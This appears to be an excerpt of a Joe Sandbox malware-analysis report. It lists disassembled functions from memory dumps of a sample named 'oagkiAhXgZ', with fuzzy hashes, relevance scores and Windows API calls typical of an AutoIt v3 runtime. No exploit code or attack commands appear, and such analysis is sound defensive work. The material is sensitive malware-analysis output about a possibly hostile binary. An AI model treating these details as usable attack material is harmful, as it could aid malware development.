Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
Instruction ID: 2467ba74e956f7be3c5dcd0eecef91dac22e5fe32f01aebf6ebefd277a7adab4
Opcode Fuzzy Hash: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
Instruction Fuzzy Hash:

Function 00AC781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00AC798B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 8972f152be45c61aa52b66aec86a96c8f5cc4be620c2144e38b20412ab91f621
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 4851AD7160C7059BDF788778895DFBE27E99B12340F1B050DEA82DB282CA25DE81DF52

Function 00AD6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
Instruction ID: 33803a092f87fb275f982d9b2c6be3054c9d6cc0bc272f0dde0b179dc00133d3
Opcode Fuzzy Hash: 42233e93606714ed3d318d226849d52b8a472c666fec1bfa63c9b8c13a8a5917
Instruction Fuzzy Hash: EA324326D69F014DD7279634DC22339A249AFB73C5F15C737F81AB6AA6EF28C5835100

Function 00ABCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
Instruction ID: a075e16cd9c5d5f8c0887f96197236b13674c342f6063d979a9a0ac2312e6767
Opcode Fuzzy Hash: 2754ffaa6b69e99852e27258e570bdd1e47c43b67c5df65915052cec8014b42c
Instruction Fuzzy Hash: E4323C31A0411D8BDF28CFAAC690ABD7BB1EB45370F288566F649CB292D734DD81DB40

Function 00AA7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eee29e916960897e1125cb968efea6c145cbe87727725b304e52ad10e8073f9
Instruction ID: f71003375893c1b7caee409d654076982377c69079cfbdaad3b4f76a588edea6
Opcode Fuzzy Hash: 6eee29e916960897e1125cb968efea6c145cbe87727725b304e52ad10e8073f9
Instruction Fuzzy Hash: E022A0B0E0060ADFDF14CF65D981AAEB3F6FF45304F244529E816AB291EB369D11CB60

Function 00AA91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ef79489b297b0a2146affbca9314a0881eae7aa519434f59c7cd376e28ba5d
Instruction ID: a4e40991ca22b1698ba36d7b5840ccd8dbbce601f56755db6cbe037bebaa7c66
Opcode Fuzzy Hash: a9ef79489b297b0a2146affbca9314a0881eae7aa519434f59c7cd376e28ba5d
Instruction Fuzzy Hash: BD02C5B0A00205EFDF04DF65D981AAEB7B5FF44340F218169E8169B2D1EB35EE24CB95

Function 00AC1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a6ee8a578cef33e0e171f062d61b2d360b6259f9153023e57764519a2527bd21
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: AE9156723080A349DB2A473E8574A7DFFE15A533A131B079DE4F3CA1C6FE248965D620

Function 00AC19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: acc6abfc207bba404495ad88bd05dbcc101a928b0300994719212c7bb04a61d9
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 4D9123723090A34ADB2D477A8574A3DFFF15A933A131B079DD4F2CA1C2FE24C9659A20

Function 00AC7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
Instruction ID: 38fd5fdfc0727e576347a373eb51c71f935bb2b9e7c85250f440d9e2b2a1b24f
Opcode Fuzzy Hash: e2c76b0c41f9858548ff1379a24deb75b9e541dd062f70bac1e49622876fcd3e
Instruction Fuzzy Hash: 6061487160C709A7DB349B288E95FBE23A4EF41750F17091EE843DF281DA159E42CF55

Function 00AC7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
Instruction ID: 326aee709f6f0a7f1dfd990c7bc05ca912b552c4d91c0266b77f34a212d8cd88
Opcode Fuzzy Hash: 412da774ac2da30e1e18f56cd13e2eac06d4f4277e315c30b244d648a58f8744
Instruction Fuzzy Hash: 71617A72608709A7DE3A9B284952FBF23A4EF42744F12095EF843DF281DA16AD42CE55

Function 00AC1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2aea3f8aaddc38ab449ebd68789bac682f960b4ed6272318b38b3f98604d19bf
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 7E81417270D0A349EB69473A8574A3EFFE15A933A131B079DD4F2CA1C2EE24D554E620

Function 00ABD064 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
Instruction ID: 58dda31bb26b502c68ece42344c185203fe9ac2880312ee1c2ab50902b7521c4
Opcode Fuzzy Hash: b30bb6936f383ce47abf5590e222f28cf6cf1f94798d2492385fc48ee83b62b3
Instruction Fuzzy Hash: 4A51289194FBD69FE7039774887A188FF30EC5B51436886CFC8805A88BD791502ADB9A

Function 00B12046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
Instruction ID: 5eecfad6af02ad2e64e8458c01559a4f10156034847f619558fa206cf40d75e1
Opcode Fuzzy Hash: 766161dc7ba3aa9d6a16737f125325f29b0774b06bd3213b3f953fee747d769b
Instruction Fuzzy Hash: D321D5326206118BD728CF79C8226BA73E5E754310F15866EE4A7C73D1DE39A944CB80

Function 00B22ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B22B30
DeleteObject.GDI32(00000000), ref: 00B22B43
DestroyWindow.USER32 ref: 00B22B52
GetDesktopWindow.USER32 ref: 00B22B6D
GetWindowRect.USER32(00000000), ref: 00B22B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B22CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B22CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22CF8
GetClientRect.USER32(00000000,?), ref: 00B22D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B22D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D80
GlobalLock.KERNEL32(00000000), ref: 00B22D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D98
GlobalUnlock.KERNEL32(00000000), ref: 00B22DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DA8
GlobalFree.KERNEL32(00000000), ref: 00B22DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3FC38,00000000), ref: 00B22DDB
GlobalFree.KERNEL32(00000000), ref: 00B22DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B22E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B22E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B2303F

Strings

, xrefs: 00B22FC5
AutoIt v3, xrefs: 00B22CF2
static, xrefs: 00B22D3A, 00B22E91
DISPLAY, xrefs: 00B22EA2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
Instruction ID: 0ae80172484f0ad3ed209ef34e0fb624a59c13c2f068804a543efac464793644
Opcode Fuzzy Hash: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
Instruction Fuzzy Hash: 9D028B71900215EFDB14DFA8DD89EAE7BB9EF49310F148558F919AB2A1CB34ED00CB60

Function 00B370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B3712F
GetSysColorBrush.USER32(0000000F), ref: 00B37160
GetSysColor.USER32(0000000F), ref: 00B3716C
SetBkColor.GDI32(?,000000FF), ref: 00B37186
SelectObject.GDI32(?,?), ref: 00B37195
InflateRect.USER32(?,000000FF,000000FF), ref: 00B371C0
GetSysColor.USER32(00000010), ref: 00B371C8
CreateSolidBrush.GDI32(00000000), ref: 00B371CF
FrameRect.USER32(?,?,00000000), ref: 00B371DE
DeleteObject.GDI32(00000000), ref: 00B371E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00B37230
FillRect.USER32(?,?,?), ref: 00B37262
GetWindowLongW.USER32(?,000000F0), ref: 00B37284

Part of subcall function 00B373E8: GetSysColor.USER32(00000012), ref: 00B37421
Part of subcall function 00B373E8: SetTextColor.GDI32(?,?), ref: 00B37425
Part of subcall function 00B373E8: GetSysColorBrush.USER32(0000000F), ref: 00B3743B
Part of subcall function 00B373E8: GetSysColor.USER32(0000000F), ref: 00B37446
Part of subcall function 00B373E8: GetSysColor.USER32(00000011), ref: 00B37463
Part of subcall function 00B373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
Part of subcall function 00B373E8: SelectObject.GDI32(?,00000000), ref: 00B37482
Part of subcall function 00B373E8: SetBkColor.GDI32(?,00000000), ref: 00B3748B
Part of subcall function 00B373E8: SelectObject.GDI32(?,?), ref: 00B37498
Part of subcall function 00B373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
Part of subcall function 00B373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
Part of subcall function 00B373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 8f2fa39e93df87ee06faa1dcb4208e696a3fc8e4efcf298769cd48fc3f7adfb8
Instruction ID: 923482a1147b561f03bb75052d2fc595c9dcf2202cdb4f22c2aecb084f486acc
Opcode Fuzzy Hash: 8f2fa39e93df87ee06faa1dcb4208e696a3fc8e4efcf298769cd48fc3f7adfb8
Instruction Fuzzy Hash: F1A19F72008701AFDB109FA4DC49E6FBBE9FB49321F200A19F962A71E1DB71E944DB51

Function 00AB8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00AB8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00AF6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AF6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AF6F43

Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5

SendMessageW.USER32(?,00001053), ref: 00AF6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AF6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FB7

Strings

0, xrefs: 00AF6DCF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
Instruction ID: 3db7a3611a2818cc1b0039826f74919013555ab0231e98a53c9140aab5e879e9
Opcode Fuzzy Hash: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
Instruction Fuzzy Hash: 40129E31200205EFD725DF68C944BB9BBF9FB44300F148469F6999B262CB35EC92DB91

Function 00B22711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B2273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B2286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B228A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B228B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B22900
GetClientRect.USER32(00000000,?), ref: 00B2290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B22955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B22964
GetStockObject.GDI32(00000011), ref: 00B22974
SelectObject.GDI32(00000000,00000000), ref: 00B22978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B22988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B22991
DeleteDC.GDI32(00000000), ref: 00B2299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B229C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B229DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B22A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B22A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B22A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B22A77
GetStockObject.GDI32(00000011), ref: 00B22A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B22A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B22A97

Strings

msctls_progress32, xrefs: 00B22A13
AutoIt v3, xrefs: 00B228F8
static, xrefs: 00B2294F, 00B22A71
DISPLAY, xrefs: 00B2295A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
Instruction ID: 2da448dcdabc46b93cb06d07a6c08f88f151445bb0d052f39d928260d156357e
